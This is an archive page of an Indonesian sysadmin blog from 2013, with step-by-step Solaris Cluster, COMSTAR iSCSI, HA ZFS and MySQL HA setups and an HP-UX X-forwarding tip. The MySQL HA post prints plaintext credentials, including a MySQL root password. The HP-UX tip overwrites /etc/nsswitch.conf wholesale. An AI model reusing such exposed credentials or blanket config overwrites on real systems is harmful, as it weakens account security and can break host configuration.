Delicious

Archives

Categories

Archive for 'Sok Tau' Category





« »

Solaris comstar – iSCSI

  ozzie / 02/07/2013
# pkg install group/feature/storage-server
           Packages to install:  47
       Create boot environment:  No
Create backup boot environment: Yes
            Services to change:   3
 
root@iSCSI-ZFS1:~# stmfadm   create-lu /dev/zvol/rdsk/iSCSI/disk0
Logical unit created: 600144F000144FFB295351DFFBB20001
root@iSCSI-ZFS1:~# stmfadm   create-lu /dev/zvol/rdsk/iSCSI/disk1
Logical unit created: 600144F000144FFB295351DFFBB80002
 
 
 
root@iSCSI-ZFS1:~# stmfadm list-lu -v
LU Name: 600144F000144FFB295351DFFBB20001
    Operational Status     : Online
    Provider Name          : sbd
    Alias                  : /dev/zvol/rdsk/iSCSI/disk0
    View Entry Count       : 0
    Data File              : /dev/zvol/rdsk/iSCSI/disk0
    Meta File              : not set
    Size                   : 32212254720
    Block Size             : 512
    Management URL         : not set
    Vendor ID              : SUN     
    Product ID             : COMSTAR         
    Serial Num             : not set
    Write Protect          : Disabled
    Write Cache Mode Select: Enabled
    Writeback Cache        : Enabled
    Access State           : Active
LU Name: 600144F000144FFB295351DFFBB80002
    Operational Status     : Online
    Provider Name          : sbd
    Alias                  : /dev/zvol/rdsk/iSCSI/disk1
    View Entry Count       : 0
    Data File              : /dev/zvol/rdsk/iSCSI/disk1
    Meta File              : not set
    Size                   : 32212254720
    Block Size             : 512
    Management URL         : not set
    Vendor ID              : SUN     
    Product ID             : COMSTAR         
    Serial Num             : not set
    Write Protect          : Disabled
    Write Cache Mode Select: Enabled
    Writeback Cache        : Enabled
    Access State           : Active


Monitoring MySQL Enterprise

  ozzie / 27/06/2013

MySQL HA – Solaris Cluster

  ozzie / 27/06/2013

build MySQL HA enterprise pada Solaris Cluster kandang-monyet & kandang-buaya…
karena Data Service MySQL belum include pada Solaris Cluster.. jadi registrasi manual..

  *** Data Services Menu ***
    Please select from one of the following options:
 
      * 1) Apache Web Server
      * 2) Oracle
      * 3) NFS
      * 4) Oracle Real Application Clusters
      * 5) PeopleSoft Enterprise Application Server
      * 6) Highly Available Storage
      * 7) Logical Hostname
      * 8) Shared Address
      * 9) Per Node Logical Hostname
      *10) Weblogic Server
 
      * ?) Help
      * q) Return to the Main Menu
    Option:

register Generic Data Service

# clresourcetype register  SUNW.gds SUNW.HAStoragePlus
# clresourcetype  show
=== Registered Resource Types ===   
....
....
Resource Type:                                  SUNW.gds:6
  RT_description:                                  Generic Data Service for Oracle Solaris Cluster
  RT_version:                                      6
  API_version:                                     2
  RT_basedir:                                      /opt/SUNWscgds/bin
  Single_instance:                                 False
  Proxy:                                           False
  Init_nodes:                                      All potential masters
  Installed_nodes:                                 <All>
  Failover:                                        False
  Pkglist:                                         <NULL>
  RT_system:                                       False
  Global_zone:                                     False
 
Resource Type:                                  SUNW.HAStoragePlus:10
  RT_description:                                  HA Storage Plus
  RT_version:                                      10
  API_version:                                     2
  RT_basedir:                                      /usr/cluster/lib/rgm/rt/hastorageplus
  Single_instance:                                 False
  Proxy:                                           False
  Init_nodes:                                      All potential masters
  Installed_nodes:                                 <All>
  Failover:                                        False
  Pkglist:                                         SUNWscu
  RT_system:                                       False
  Global_zone:                                     True
.....

Create resource group dan logical hostname untuk Failover

# clresourcegroup create MySQL-RG
# clresource create -g MySQL-RG -t SUNW.HAStoragePlus -p AffinityOn=TRUE -p Zpools=zMysql -p ZpoolsSearchDir=/dev/did/dsk MySQL-HAS
# clreslogicalhostname create -g MySQL-RG -h buaya  MySQL-LH 
# clresource list -v
Resource Name       Resource Type            Resource Group
-------------       -------------            --------------
MySQL-LH            SUNW.LogicalHostname:4   MySQL-RG
MySQL-HAS           SUNW.HAStoragePlus:10    MySQL-RG

Register Manual:
setting parameter sesuai konfigurasi & register…

# cp /opt/SUNWscmys/util/mysql_config /export/home/ozzie/mysql_config
# cp /opt/SUNWscmys/util/ha_mysql_config /export/home/ozzie/ha_mysql_config

mysql_config:

MYSQL_BASE=/opt/mysql/mysql
MYSQL_USER=root
MYSQL_PASSWD=baueek
MYSQL_HOST=Buaya
FMUSER=fmuser
FMPASS=fmuser
MYSQL_SOCK=/tmp/mysql.sock
MYSQL_NIC_HOSTNAME=Buaya
MYSQL_DATADIR=/global/mysql

ha_mysql_config:

 
RS=MySQL-RS
RG=MySQL-RG
PORT=3306
LH=buaya
SCALABLE=
LB_POLICY=
RS_PROP=
HAS_RS=MySQL-HAS
 
BASEDIR=/opt/mysql/mysql
DATADIR=/global/mysql
MYSQLUSER=mysql
MYSQLHOST=buaya
FMUSER=fmuser
FMPASS=fmuser
LOGDIR=/global/mysql/logs
CHECK=yes

register Data Service:

# /opt/SUNWscmys/util/mysql_register -f /export/home/ozzie/mysql_config  
# /opt/SUNWscmys/util/ha_mysql_register -f /export/home/ozzie/ha_mysql_config  
# clrs enable MySQL-RS

Taddaaaaa <:-p

bash-3.2# clrs status
 
=== Cluster Resources ===
 
Resource Name       Node Name      State        Status Message
-------------       ---------      -----        --------------
MySQL-RS            buaya2         Online       Online - Service is online.
                    buaya1         Offline      Offline
 
MySQL-LH            buaya2         Online       Online - LogicalHostname online.
                    buaya1         Offline      Offline
 
MySQL-HAS           buaya2         Online       Online
                    buaya1         Offline      Offline

tinggal switch antar node dah #:-s

# mysql -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 84
Server version: 5.6.12-enterprise-commercial-advanced-log MySQL Enterprise Server - Advanced Edition (Commercial)
 
Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
 
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
mysql>



Shutdown semua node.

root@Monyet3:~# scshutdown 
Broadcast Message from root (???) on Monyet3 Mon Jun 24 02:42:38...
 The cluster kandang-monyet will be shutdown in  1 minute
 
Broadcast Message from root (???) on Monyet3 Mon Jun 24 02:43:08...
 The cluster kandang-monyet will be shutdown in  30 seconds
 
Do you want to continue? (y or n):   y

Berhubung mesin SPARC tinggal tambah option di OKpromt..

SPARC Enterprise T5220, No Keyboard
Copyright (c) 1998, 2012, Oracle and/or its affiliates. All rights reserved.
OpenBoot 4.33.6.b, 4096 MB memory available, Serial #83382360.
Ethernet address 0:14:4f:f8:50:58, Host ID: 84f85058.
 
 
 
{0} ok boot -x
Boot device: /virtual-devices@100/channel-devices@200/disk@0:a  File and args: -x
SunOS Release 5.11 Version 11.1 64-bit
Copyright (c) 1983, 2012, Oracle and/or its affiliates. All rights reserved.
\

tinggal execute clsetup

  *** Main Menu ***
 
    Select from one of the following options:
 
        1) Change Network Addressing and Ranges for the Cluster Transport
        2) Show Network Addressing and Ranges for the Cluster Transport
 
        ?) Help with menu options
        q) Quit
 
    Option:

  >>> Change Network Addressing and Ranges for the Cluster Transport <<<
 
    Network addressing for the cluster transport is currently configured 
    as follows:
 
 
=== Private Network ===                        
 
private_netaddr:                                172.16.0.0
  private_netmask:                                 255.255.240.0
  max_nodes:                                       62
  max_privatenets:                                 10
  num_zoneclusters:                                12
  num_xip_zoneclusters:                            3
 
    Do you want to change this configuration (yes/no) [yes]?  
 
    The default network address for the cluster transport is 172.16.0.0.
 
    Do you want to use the default (yes/no) [yes]?  no
 
    What network address do you want to use?  172.16.202.0
 
    The combination of private netmask and network address will dictate 
    both the maximum number of nodes and private networks that can be 
    supported by a cluster. Given your private network address, this 
    program will generate a range of recommended private netmasks based on
    the maximum number of nodes and private networks that you anticipate 
    for this cluster.
 
    In specifying the anticipated number of maximum nodes and private 
    networks for this cluster, it is important that you give serious 
    consideration to future growth potential. While both the private 
    netmask and network address can be changed later, the tools for making
    such changes require that all nodes in the cluster be booted into 
    noncluster mode.
 
    Maximum number of nodes anticipated for future growth [3]?  
    Maximum number of private networks anticipated for future growth [2]?  
 
    Specify a netmask of 255.255.254.0 to meet anticipated future 
    requirements of 3 cluster nodes and 2 private networks.
 
    To accommodate more growth, specify a netmask of 255.255.254.0 to 
    support up to 6 cluster nodes and 4 private networks.
 
    What netmask do you want to use [255.255.254.0]?  
 
    Is it okay to proceed with the update (yes/no) [yes]?  
 
/usr/cluster/bin/cluster set-netprops -p private_netaddr=172.16.202.0 -p private_netmask=255.255.254.0 -p max_nodes=3 -p max_privatenets=2
Attempting to contact node "Monyet3" ...done
Attempting to contact node "Monyet2" ...done
 
    Command completed successfully.

tinggal reboot dan taadddaaaaa.. 8-}

root@Monyet1:~# clinterconnect show
 
=== Transport Cables ===                       
 
Transport Cable:                                Monyet3:net0,switch1@1
  Endpoint1:                                       Monyet3:net0
  Endpoint2:                                       switch1@1
  State:                                           Enabled
 
Transport Cable:                                Monyet3:net2,switch2@1
  Endpoint1:                                       Monyet3:net2
  Endpoint2:                                       switch2@1
  State:                                           Enabled
 
Transport Cable:                                Monyet2:net0,switch1@2
  Endpoint1:                                       Monyet2:net0
  Endpoint2:                                       switch1@2
  State:                                           Enabled
 
Transport Cable:                                Monyet2:net2,switch2@2
  Endpoint1:                                       Monyet2:net2
  Endpoint2:                                       switch2@2
  State:                                           Enabled
 
Transport Cable:                                Monyet1:net0,switch1@3
  Endpoint1:                                       Monyet1:net0
  Endpoint2:                                       switch1@3
  State:                                           Enabled
 
Transport Cable:                                Monyet1:net2,switch2@3
  Endpoint1:                                       Monyet1:net2
  Endpoint2:                                       switch2@3
  State:                                           Enabled
 
 
=== Transport Switches ===                     
 
Transport Switch:                               switch1
  State:                                           Enabled
  Type:                                            switch
  Port Names:                                      1 2 3
  Port State(1):                                   Enabled
  Port State(2):                                   Enabled
  Port State(3):                                   Enabled
 
Transport Switch:                               switch2
  State:                                           Enabled
  Type:                                            switch
  Port Names:                                      1 2 3
  Port State(1):                                   Enabled
  Port State(2):                                   Enabled
  Port State(3):                                   Enabled
 
 
--- Transport Adapters for Monyet3 ---         
 
Transport Adapter:                              net0
  State:                                           Enabled
  Transport Type:                                  dlpi
  device_name:                                     net
  device_instance:                                 0
  lazy_free:                                       1
  dlpi_heartbeat_timeout:                          10000
  dlpi_heartbeat_quantum:                          1000
  nw_bandwidth:                                    80
  bandwidth:                                       70
  ip_address:                                      172.16.202.17
  netmask:                                         255.255.255.248
  Port Names:                                      0
  Port State(0):                                   Enabled
 
Transport Adapter:                              net2
  State:                                           Enabled
  Transport Type:                                  dlpi
  device_name:                                     net
  device_instance:                                 2
  lazy_free:                                       1
  dlpi_heartbeat_timeout:                          10000
  dlpi_heartbeat_quantum:                          1000
  nw_bandwidth:                                    80
  bandwidth:                                       70
  ip_address:                                      172.16.202.9
  netmask:                                         255.255.255.248
  Port Names:                                      0
  Port State(0):                                   Enabled
 
 
--- Transport Adapters for Monyet2 ---         
 
Transport Adapter:                              net0
  State:                                           Enabled
  Transport Type:                                  dlpi
  device_name:                                     net
  device_instance:                                 0
  lazy_free:                                       1
  dlpi_heartbeat_timeout:                          10000
  dlpi_heartbeat_quantum:                          1000
  nw_bandwidth:                                    80
  bandwidth:                                       70
  ip_address:                                      172.16.202.18
  netmask:                                         255.255.255.248
  Port Names:                                      0
  Port State(0):                                   Enabled
 
Transport Adapter:                              net2
  State:                                           Enabled
  Transport Type:                                  dlpi
  device_name:                                     net
  device_instance:                                 2
  lazy_free:                                       1
  dlpi_heartbeat_timeout:                          10000
  dlpi_heartbeat_quantum:                          1000
  nw_bandwidth:                                    80
  bandwidth:                                       70
  ip_address:                                      172.16.202.10
  netmask:                                         255.255.255.248
  Port Names:                                      0
  Port State(0):                                   Enabled
 
 
--- Transport Adapters for Monyet1 ---         
 
Transport Adapter:                              net0
  State:                                           Enabled
  Transport Type:                                  dlpi
  device_name:                                     net
  device_instance:                                 0
  lazy_free:                                       1
  dlpi_heartbeat_timeout:                          10000
  dlpi_heartbeat_quantum:                          1000
  nw_bandwidth:                                    80
  bandwidth:                                       70
  ip_address:                                      172.16.202.19
  netmask:                                         255.255.255.248
  Port Names:                                      0
  Port State(0):                                   Enabled
 
Transport Adapter:                              net2
  State:                                           Enabled
  Transport Type:                                  dlpi
  device_name:                                     net
  device_instance:                                 2
  lazy_free:                                       1
  dlpi_heartbeat_timeout:                          10000
  dlpi_heartbeat_quantum:                          1000
  nw_bandwidth:                                    80
  bandwidth:                                       70
  ip_address:                                      172.16.202.11
  netmask:                                         255.255.255.248
  Port Names:                                      0
  Port State(0):                                   Enabled


HA storage ZFS

  ozzie / 23/06/2013

simulasi High-Availability Storage dengan 3 node Solaris Cluster dan iSCSI dengan Solaris 11 & Solaris Cluster 4.1.


setelah Solaris Cluster sudah up..

root@Monyet1:~# cluster show -t global
=== Cluster ===                                
Cluster Name:                                   kandang-monyet
  clusterid:                                       0x51C6CA70
  installmode:                                     disabled
  heartbeat_timeout:                               10000
  heartbeat_quantum:                               1000
  private_netaddr:                                 172.16.0.0
  private_netmask:                                 255.255.240.0
  max_nodes:                                       62
  max_privatenets:                                 10
  num_zoneclusters:                                12
  num_xip_zoneclusters:                            3
  udp_session_timeout:                             480
  concentrate_load:                                False
  resource_security:                               SECURE
  global_fencing:                                  prefer3
  Node List:                                       Monyet3, Monyet2, Monyet1
 
root@Monyet1:~# clnode status
=== Cluster Nodes ===
--- Node Status ---
 
Node Name                                       Status
---------                                       ------
Monyet3                                         Online
Monyet2                                         Online
Monyet1                                         Online

Add quorum disk device

root@Monyet1:~# cldevice status
=== Cluster DID Devices ===
Device Instance              Node               Status
---------------              ----               ------
/dev/did/rdsk/d1             Monyet3            Unmonitored
 
/dev/did/rdsk/d2             Monyet1            Ok
                             Monyet2            Ok
                             Monyet3            Ok
 
/dev/did/rdsk/d3             Monyet2            Unmonitored
 
/dev/did/rdsk/d5             Monyet1            Unmonitored

Enable automatic node reboot if all monitored disk fail:

root@Monyet1:~# clnode set -p reboot_on_path_failure=enabled +
 
root@Monyet1:~# clnode show
 
=== Cluster Nodes ===                          
 
Node Name:                                      Monyet3
  Node ID:                                         1
  Enabled:                                         yes
  privatehostname:                                 clusternode1-priv
  reboot_on_path_failure:                          enabled
  globalzoneshares:                                1
  defaultpsetmin:                                  1
  quorum_vote:                                     1
  quorum_defaultvote:                              1
  quorum_resv_key:                                 0x51C6CA7000000001
  Transport Adapter List:                          net0, net2
 
Node Name:                                      Monyet2
  Node ID:                                         2
  Enabled:                                         yes
  privatehostname:                                 clusternode2-priv
  reboot_on_path_failure:                          enabled
  globalzoneshares:                                1
  defaultpsetmin:                                  1
  quorum_vote:                                     1
  quorum_defaultvote:                              1
  quorum_resv_key:                                 0x51C6CA7000000002
  Transport Adapter List:                          net0, net2
 
Node Name:                                      Monyet1
  Node ID:                                         3
  Enabled:                                         yes
  privatehostname:                                 clusternode3-priv
  reboot_on_path_failure:                          enabled
  globalzoneshares:                                1
  defaultpsetmin:                                  1
  quorum_vote:                                     1
  quorum_defaultvote:                              1
  quorum_resv_key:                                 0x51C6CA7000000003
  Transport Adapter List:                          net0, net2

Registering the cluster storage & Network service

root@Monyet1:~# clresourcetype register SUNW.gds SUNW.HAStoragePlus



Create Resource Group dari group Monyet

root@Monyet1:~# clresourcegroup create -n Monyet1,Monyet2,Monyet3 RG-MONYET
root@Monyet1:~# clresourcegroup status
 
=== Cluster Resource Groups ===
 
Group Name       Node Name       Suspended      Status
----------       ---------       ---------      ------
RG-MONYET        Monyet1         No             Unmanaged
                 Monyet2         No             Unmanaged
                 Monyet3         No             Unmanaged
 
root@Monyet1:~# clresourcegroup manage RG-MONYET
root@Monyet1:~# clresourcegroup status
 
=== Cluster Resource Groups ===
 
Group Name       Node Name       Suspended      Status
----------       ---------       ---------      ------
RG-MONYET        Monyet1         No             Offline
                 Monyet2         No             Offline
                 Monyet3         No             Offline



Create ZFS pool isi pelem – ‘poolBOKEP’ – sebelom tambah ke resource cluster

root@Monyet1:~# echo | format
Searching for disks...done
AVAILABLE DISK SELECTIONS:
       0. c2d0 <SUN-Disk-40GB cyl 1135 alt 2 hd 96 sec 768>
          /virtual-devices@100/channel-devices@200/disk@0
       1. c3t0d0 <iSCSI Disk-0123 cyl 19455 alt 2 hd 255 sec 63>
          /iscsi/disk@0000iqn.2013-03.org.kebonbinatang.storage1%3Adisk00001,0
Specify disk (enter its number): Specify disk (enter its number): 
 
root@Monyet1:~# zpool  create poolBOKEP c3t0d0
root@Monyet1:~# zpool export poolBOKEP



tambah ‘poolBOKEP’ sebagai resource group RG-MONYET:

root@Monyet1:~# clresource create -g RG-MONYET -t SUNW.HAStoragePlus -p AffinityOn=TRUE -p  Zpools=poolBOKEP  -p \ ZpoolsSearchDir=/dev/did/dsk RS-BOKEP-HAS
root@Monyet1:~# clresource list
RS-BOKEP-HAS
root@Monyet1:~# clresource show
=== Resources ===                              
 
Resource:                                       RS-BOKEP-HAS
  Type:                                            SUNW.HAStoragePlus:10
  Type_version:                                    10
  Group:                                           RG-MONYET
  R_description:                                   
  Resource_project_name:                           default
  Enabled{Monyet1}:                                True
  Enabled{Monyet2}:                                True
  Enabled{Monyet3}:                                True
  Monitored{Monyet1}:                              True
  Monitored{Monyet2}:                              True
  Monitored{Monyet3}:                              True

Import poolBokep tadi:

root@Monyet1:~#  zpool import poolBOKEP

tambah Virtual IP resource untuk resource group RG-MONYET :

root@Monyet1:~# clreslogicalhostname create -g RG-MONYET -h Monyet -N  \
sc_ipmp0@Monyet1,sc_ipmp0@Monyet2,sc_ipmp0@Monyet3 RS-MONYET
 
root@Monyet1:~# clresource list
RS-MONYET
RS-BOKEP-HAS
root@Monyet1:~# clresource show
 
=== Resources ===                              
 
Resource:                                       RS-BOKEP-HAS
  Type:                                            SUNW.HAStoragePlus:10
  Type_version:                                    10
  Group:                                           RG-MONYET
  R_description:                                   
  Resource_project_name:                           default
  Enabled{Monyet1}:                                True
  Enabled{Monyet2}:                                True
  Enabled{Monyet3}:                                True
  Monitored{Monyet1}:                              True
  Monitored{Monyet2}:                              True
  Monitored{Monyet3}:                              True
 
Resource:                                       RS-MONYET
  Type:                                            SUNW.LogicalHostname:4
  Type_version:                                    4
  Group:                                           RG-MONYET
  R_description:                                   
  Resource_project_name:                           default
  Enabled{Monyet1}:                                True
  Enabled{Monyet2}:                                True
  Enabled{Monyet3}:                                True
  Monitored{Monyet1}:                              True
  Monitored{Monyet2}:                              True
  Monitored{Monyet3}:                              True

sampai sini tinggal pindah2 resource group ke Monyet-Monyet yg laen ;)) [failover]

root@Monyet1:~# clresourcegroup switch -n Monyet3 RG-MONYET

atau mau di balikin ulang :-??

root@Monyet1:~#  clresourcegroup remaster RG-MONYET

tinggal isi pelem di poolBOKEP dah \:d/

root@Monyet3:~# scstat 
------------------------------------------------------------------
 
-- Cluster Nodes --
 
                    Node name           Status
                    ---------           ------
  Cluster node:     Monyet3             Online
  Cluster node:     Monyet2             Online
  Cluster node:     Monyet1             Online
 
------------------------------------------------------------------
 
-- Cluster Transport Paths --
 
                    Endpoint               Endpoint               Status
                    --------               --------               ------
  Transport path:   Monyet3:net2           Monyet2:net2           Path online
  Transport path:   Monyet3:net0           Monyet2:net0           Path online
  Transport path:   Monyet3:net2           Monyet1:net2           Path online
  Transport path:   Monyet3:net0           Monyet1:net0           Path online
  Transport path:   Monyet2:net2           Monyet1:net2           Path online
  Transport path:   Monyet2:net0           Monyet1:net0           Path online
 
------------------------------------------------------------------
 
-- Quorum Summary from latest node reconfiguration --
 
  Quorum votes possible:      5
  Quorum votes needed:        3
  Quorum votes present:       5
 
 
-- Quorum Votes by Node (current status) --
 
                    Node Name           Present Possible Status
                    ---------           ------- -------- ------
  Node votes:       Monyet3             1        1       Online
  Node votes:       Monyet2             1        1       Online
  Node votes:       Monyet1             1        1       Online
 
 
-- Quorum Votes by Device (current status) --
 
                    Device Name         Present Possible Status
                    -----------         ------- -------- ------
  Device votes:     /dev/did/rdsk/d2s2  2        2       Online
 
------------------------------------------------------------------
 
-- Device Group Servers --
 
                         Device Group        Primary             Secondary
                         ------------        -------             ---------
 
 
-- Device Group Status --
 
                              Device Group        Status              
                              ------------        ------              
 
 
-- Multi-owner Device Groups --
 
                              Device Group        Online Status
                              ------------        -------------
 
------------------------------------------------------------------
 
-- Resource Groups and Resources --
 
            Group Name     Resources
            ----------     ---------
 Resources: RG-MONYET      RS-BOKEP-HAS RS-MONYET
 
 
-- Resource Groups --
 
            Group Name     Node Name                State          Suspended
            ----------     ---------                -----          ---------
     Group: RG-MONYET      Monyet1                  Offline        No
     Group: RG-MONYET      Monyet2                  Online         No
     Group: RG-MONYET      Monyet3                  Offline        No
 
 
-- Resources --
 
            Resource Name  Node Name                State          Status Message
            -------------  ---------                -----          --------------
  Resource: RS-BOKEP-HAS   Monyet1                  Offline        Offline
  Resource: RS-BOKEP-HAS   Monyet2                  Online         Online
  Resource: RS-BOKEP-HAS   Monyet3                  Offline        Offline
 
  Resource: RS-MONYET      Monyet1                  Offline        Offline - LogicalHostname offline.
  Resource: RS-MONYET      Monyet2                  Online         Online - LogicalHostname online.
  Resource: RS-MONYET      Monyet3                  Offline        Offline
 
------------------------------------------------------------------
 
-- IPMP Groups --
 
              Node Name           Group   Status         Adapter   Status
              ---------           -----   ------         -------   ------
  IPMP Group: Monyet3             sc_ipmp0 Online         net1      Online
 
  IPMP Group: Monyet2             sc_ipmp0 Online         net1      Online
 
  IPMP Group: Monyet1             sc_ipmp0 Online         net1      Online
 
------------------------------------------------------------------


Disable fencing device shared-storage

  ozzie / 23/06/2013

berhubung pakai iSCSI untuk share-storage ke semua buaya ;))

# echo | format
Searching for disks...done
 
AVAILABLE DISK SELECTIONS:
       0. c1t0d0 <HITACHI-H103014SCSUN146G-A160-136.73GB>
          /pci@0/pci@0/pci@2/scsi@0/sd@0,0
       1. c2t2d0 <iSCSIDisk-0123 cyl 6524 alt 2 hd 255 sec 63>
          /iscsi/disk@0000iqn.2011-03.org.kebonbinatang.storage2%3Adisk20001,0
       2. c2t3d0 <iSCSIDisk-0123 cyl 6524 alt 2 hd 255 sec 63>
          /iscsi/disk@0000iqn.2011-03.org.kebonbinatang.storage2%3Adisk20001,1
Specify disk (enter its number): Specify disk (enter its number):

# clq show
 
=== Cluster Nodes ===                          
 
Node Name:                                      Buaya1
  Node ID:                                         1
  Quorum Vote Count:                               1
  Reservation Key:                                 0x51C625D900000001
 
Node Name:                                      Buaya2
  Node ID:                                         2
  Quorum Vote Count:                               1
  Reservation Key:                                 0x51C625D900000002
 
 
=== Quorum Devices ===                         
 
Quorum Device Name:                             d2
  Enabled:                                         yes
  Votes:                                           1
  Global Name:                                     /dev/did/rdsk/d2s2
  Type:                                            shared_disk
  Access Mode:                                     scsi2
  Hosts (enabled):                                 Buaya1, Buaya2

cldevice show       
 
=== DID Device Instances ===                   
 
DID Device Name:                                /dev/did/rdsk/d1
  Full Device Path:                                Buaya2:/dev/rdsk/c2t3d0
  Full Device Path:                                Buaya1:/dev/rdsk/c2t3d0
  Replication:                                     none
  default_fencing:                                 global
 
DID Device Name:                                /dev/did/rdsk/d2
  Full Device Path:                                Buaya1:/dev/rdsk/c2t2d0
  Full Device Path:                                Buaya2:/dev/rdsk/c2t2d0
  Replication:                                     none
  default_fencing:                                 global
 
DID Device Name:                                /dev/did/rdsk/d3
  Full Device Path:                                Buaya1:/dev/rdsk/c1t0d0
  Replication:                                     none
  default_fencing:                                 global
 
DID Device Name:                                /dev/did/rdsk/d4
  Full Device Path:                                Buaya2:/dev/rdsk/c1t0d0
  Replication:                                     none
  default_fencing:                                 global



disable device d2 yg shared tadi

# cldevice set  -p default_fencing=nofencing-noscrub d2
#
# cldevice show       
 
=== DID Device Instances ===                   
.....
.....
DID Device Name:                                /dev/did/rdsk/d2
  Full Device Path:                                Buaya1:/dev/rdsk/c2t2d0
  Full Device Path:                                Buaya2:/dev/rdsk/c2t2d0
  Replication:                                     none
  default_fencing:                                 nofencing
 
.....
.....


Solaris Cluster

  ozzie / 21/06/2013


download Oracle Solaris Cluster 4.1. kali ini base OS nya Solaris 11 dengan IPS

 

mount source repository dan refresh IPS publisher nya:

# mount -F hsfs /export/home/ozzie/osc-4_1-ga-repo-full.iso  /mnt/
# pkg publisher
PUBLISHER                   TYPE     STATUS P LOCATION
solaris                     origin   online F http://pkg.oracle.com/solaris/release/
 
# pkg set-publisher -G "*" -g file:///mnt/repo ha-cluster
# pkg refresh
# pkg publisher
PUBLISHER                   TYPE     STATUS P LOCATION
ha-cluster                  origin   online F file:///mnt/repo/
solaris                     origin   online F http://pkg.oracle.com/solaris/release/
 
# pkg install ha-cluster-framework-full
           Packages to install:  26
       Create boot environment:  No
Create backup boot environment: Yes
            Services to change:   6
 
DOWNLOAD                                PKGS         FILES    XFER (MB)   SPEED
Completed                              26/26     2794/2794    27.5/27.5    0B/s
 
PHASE                                          ITEMS
Installing new actions                     3936/3936
Updating package state database                 Done 
Updating image state                            Done 
Creating fast lookup database                   Done

Create cluster /usr/cluster/bin/scinstall

 
  *** Main Menu ***
 
    Please select from one of the following (*) options:
 
      * 1) Create a new cluster or add a cluster node
        2) Upgrade this cluster node
        3) Manage a dual-partition upgrade
      * 4) Print release information for this cluster node
 
      * ?) Help with menu options
      * q) Quit
 
    Option:  1
 
 
  *** New Cluster and Cluster Node Menu ***
 
    Please select from any one of the following options:
 
        1) Create a new cluster
        2) Create just the first node of a new cluster on this machine
        3) Add this machine as a node in an existing cluster
 
        ?) Help with menu options
        q) Return to the Main Menu
 
    Option:

  >>> Cluster Name <<<
 
    Each cluster has a name assigned to it. The name can be made up of any
    characters other than whitespace. Each cluster name should be unique 
    within the namespace of your enterprise.
 
    What is the name of the cluster you want to establish?  Kandang-Monyet
 
 
  >>> Check <<<
 
    This step allows you to run cluster check to verify that certain basic
    hardware and software pre-configuration requirements have been met. If
    cluster check detects potential problems with configuring this machine
    as a cluster node, a report of violated checks is prepared and 
    available for display on the screen.
 
    Do you want to run cluster check (yes/no) [yes]?  
 
 
 
  >>> Cluster Nodes <<<
 
    This Oracle Solaris Cluster release supports a total of up to 16 
    nodes.
 
    List the names of the other nodes planned for the initial cluster 
    configuration. List one node name per line. When finished, type 
    Control-D:
 
    Node name (Control-D to finish):  Monyet1
    Node name (Control-D to finish):  Monyet2
    Node name (Control-D to finish):  Monyet3
    Node name (Control-D to finish):  ^D
 
 
 
  >>> Cluster Transport Adapters and Cables <<<
 
    Transport adapters are the adapters that attach to the private cluster
    interconnect.
 
    Select the first cluster transport adapter:
 
        1) net0
        2) net2
        3) Other
 
    Option:  1
 
    Searching for any unexpected network traffic on "net0" ... done
Unexpected network traffic was seen on "net0".
"net0" may be cabled to a public network.
 
    Do you want to use "net0" anyway (yes/no) [no]?  yes
 
    Select the second cluster transport adapter:
 
        1) net0
        2) net2
        3) Other
 
    Option:  2
 
    Searching for any unexpected network traffic on "net2" ... done
Unexpected network traffic was seen on "net2".
"net2" may be cabled to a public network.
 
    Do you want to use "net2" anyway (yes/no) [no]?  
 
 
 
  >>> Confirmation <<<
 
    Your responses indicate the following options to scinstall:
 
      scinstall -i \ 
           -C kandang-monyet \ 
           -F \ 
           -G lofi \ 
           -T node=Monyet1,node=Monyet2,authtype=sys \ 
           -w netaddr=172.16.0.0,netmask=255.255.240.0,maxnodes=32,maxprivatenets=10,numvirtualclusters=12,numxipvirtualclusters=3 \ 
           -A trtype=dlpi,name=net0 -A trtype=dlpi,name=net2 \ 
           -B type=switch,name=switch1 -B type=switch,name=switch2 \ 
           -m endpoint=:net0,endpoint=switch1 \ 
           -m endpoint=:net2,endpoint=switch2 \ 
           -P task=security,state=SECURE
 
    Are these the options you want to use (yes/no) [yes]?  
 
    Do you want to continue with this configuration step (yes/no) [yes]?  
 
 
Initializing cluster name to "kandang-monyet" ... done
Initializing authentication options ... done
Initializing configuration for adapter "net0" ... done
Initializing configuration for adapter "net2" ... done
Initializing configuration for switch "switch1" ... done
Initializing configuration for switch "switch2" ... done
Initializing configuration for cable ... done
Initializing configuration for cable ... done
Initializing private network address options ... done
 
 
Setting the node ID for "Monyet1" ... done (id=1)


ssh X-Forward – HPUX

  ozzie / 16/06/2013

just reminder :D

ketika konfigurasi X-Forwarding ssh di mesin HP-UX udah fix.. tapi muncul error :
Error: Can’t open display:
Error: Couldn’t find per display information

sedangkan / seumpama / andaikata pengen running aplikasi yg perlu GUI.. #:-s

 

# echo "hosts: files dns" > /etc/nsswitch.conf

sepele sihh… 8-} tapi daripada panik? =))



Pre-Requisites:

  • Oracle Database 11g
  • Oracle Business Intelligence
  • Repository Creation Utility (RCU) tools
  • nls_length_semantics parameter pada database harus di set BYTE (CHAR not supported)
  • UTF-8
  • enable X Forwarding via SSH
    edit /etc/ssh/sshd_config

    # X11 tunneling options
    X11Forwarding yes


     

     

     

     

     

     

     

    default Oracle Business Intelligence URL:

    Component Default URL Port
    Oracle BI Presentation Services http://host:9704/analytics 9704
    WebLogic Console http://host:7001/console 7001
    Enterprise Manager http://host:7001/em 7001
    Business Intelligence Publisher http://host:9704/xmlpserver 9704
    Real-Time Decisions http://host:9704/ui 9704

    bersambung..



[video]Beautiful Dangerous

  ozzie / 23/05/2013

Installing Oracle VM Manager

  ozzie / 23/05/2013

Oracle VM Manager dengan base OS menggunakan Oracle Linux 6.x. install OS seperti biasa..

Minimum spec prerequisite OVM:

  • – Memory: 1.5 GB (4GB jika pakai Oracle DataBase XE)
  • – Processor: 64 bit
  • – Swap: > 2.1 GB
  • – Disk Space: 5 GB untuk /u01 dan 2 GB /tmp

 

semua source dapat di download di: https://edelivery.oracle.com/
untuk update packages Oracle Linux via yum (bisa baca disini

berikut list kebutuhan port untuk komunikasi OVM – OVS – Client



newborn race

  ozzie / 14/05/2013



#:-s #:-s akhirnya ada waktu ngedit video adventure OutBound D2M Hasil Kebon 2013

Tanakita CampSite: 1-3 Maret 2013



